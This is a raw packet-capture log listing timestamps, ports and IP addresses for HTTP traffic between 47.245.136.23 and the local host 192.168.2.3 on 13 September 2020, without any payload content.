Sep 13, 2020 20:55:12.837733030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837768078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837791920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837820053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837841034 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.837847948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837872028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837894917 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837904930 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837914944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837925911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837950945 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837973118 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.837987900 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838021994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838027954 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.838052988 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838076115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838098049 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838118076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838140965 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838164091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838187933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838198900 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.838212013 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838226080 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838233948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838243008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838289976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838335991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838361979 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838406086 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838409901 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.838429928 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838438988 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838448048 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838455915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838468075 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838489056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838500977 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838525057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838546991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838566065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838587999 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.838589907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838604927 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838613987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838623047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838634014 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838641882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838650942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838675022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838694096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838717937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838740110 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838763952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838768005 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.838778973 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838787079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838802099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838819981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838841915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838865042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838884115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838906050 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838927984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838941097 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838941097 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.838954926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838963985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838972092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838980913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.838994980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839013100 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839024067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839046955 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839061022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839076996 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.839078903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839102030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839124918 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839148045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839162111 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839179993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839204073 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839227915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839240074 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.839246035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839266062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839283943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839308977 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839323997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839333057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839340925 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839351892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839371920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839381933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839397907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839406013 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.839449883 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839468956 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839488029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839510918 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839534998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839549065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839557886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839565992 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839581966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839603901 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.839606047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839624882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839651108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839679003 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.839679956 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839689970 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839708090 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839725018 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839735031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839744091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839754105 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839762926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839771986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839781046 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839790106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839798927 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839807034 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839816093 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839824915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839833975 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839843035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839859009 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839869022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839878082 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839900017 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839914083 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839932919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839951038 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839981079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.839993000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840007067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840027094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840050936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840065956 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840085030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840106964 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840118885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840131998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840142012 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840154886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840166092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840177059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840189934 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840200901 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840214014 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840224981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840238094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840250015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840260983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840274096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840284109 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840292931 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840298891 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.840301991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840311050 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840318918 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840327978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840337038 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840344906 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840351105 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.840354919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840363026 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840373039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840392113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840400934 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840409994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840428114 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840439081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840447903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.840454102 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.840794086 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.841103077 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.841140985 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.907457113 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.932666063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932687998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932702065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932713032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932723999 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932735920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932745934 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932754993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932764053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932773113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932781935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.932893991 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.932971001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933029890 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933074951 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933128119 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933146000 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.933199883 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933299065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933327913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933336973 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.933339119 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933346987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933356047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933366060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933377028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933388948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933398962 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933409929 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933420897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933434010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933455944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933485985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933533907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933587074 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933624983 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.933660984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933728933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933757067 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.933804035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933851004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933875084 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.933887005 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933959961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.933984995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934005022 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.934010983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934030056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934047937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934079885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934115887 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934156895 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934206963 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.934221983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934241056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934272051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934348106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934396029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934421062 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.934432983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934536934 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934567928 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.934611082 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934658051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934685946 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.934695005 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934771061 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934803963 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.934849024 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934886932 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.934932947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.934988976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935015917 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.935054064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935106993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935110092 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.935168982 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935210943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935233116 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.935240984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935271978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935300112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935337067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935398102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935431957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935451031 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.935451984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935471058 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935487986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935499907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935511112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935520887 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935529947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935538054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935545921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935555935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935570002 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935580015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935590029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935600042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935609102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935619116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935627937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935637951 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935650110 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935659885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935671091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935682058 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935691118 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935703039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935714006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935724974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935735941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935746908 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935774088 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935786963 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935796976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935797930 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.935810089 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935827971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935837030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935844898 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935853958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935863972 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935878992 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935889006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935897112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935905933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935914993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935924053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935933113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935940981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935950041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935960054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935970068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935980082 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.935991049 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936000109 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936008930 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936019897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936031103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936041117 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936050892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936060905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936072111 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936081886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936091900 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936104059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936115026 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936125040 CEST	80	49723	47.245.136.23	192.168.2.3
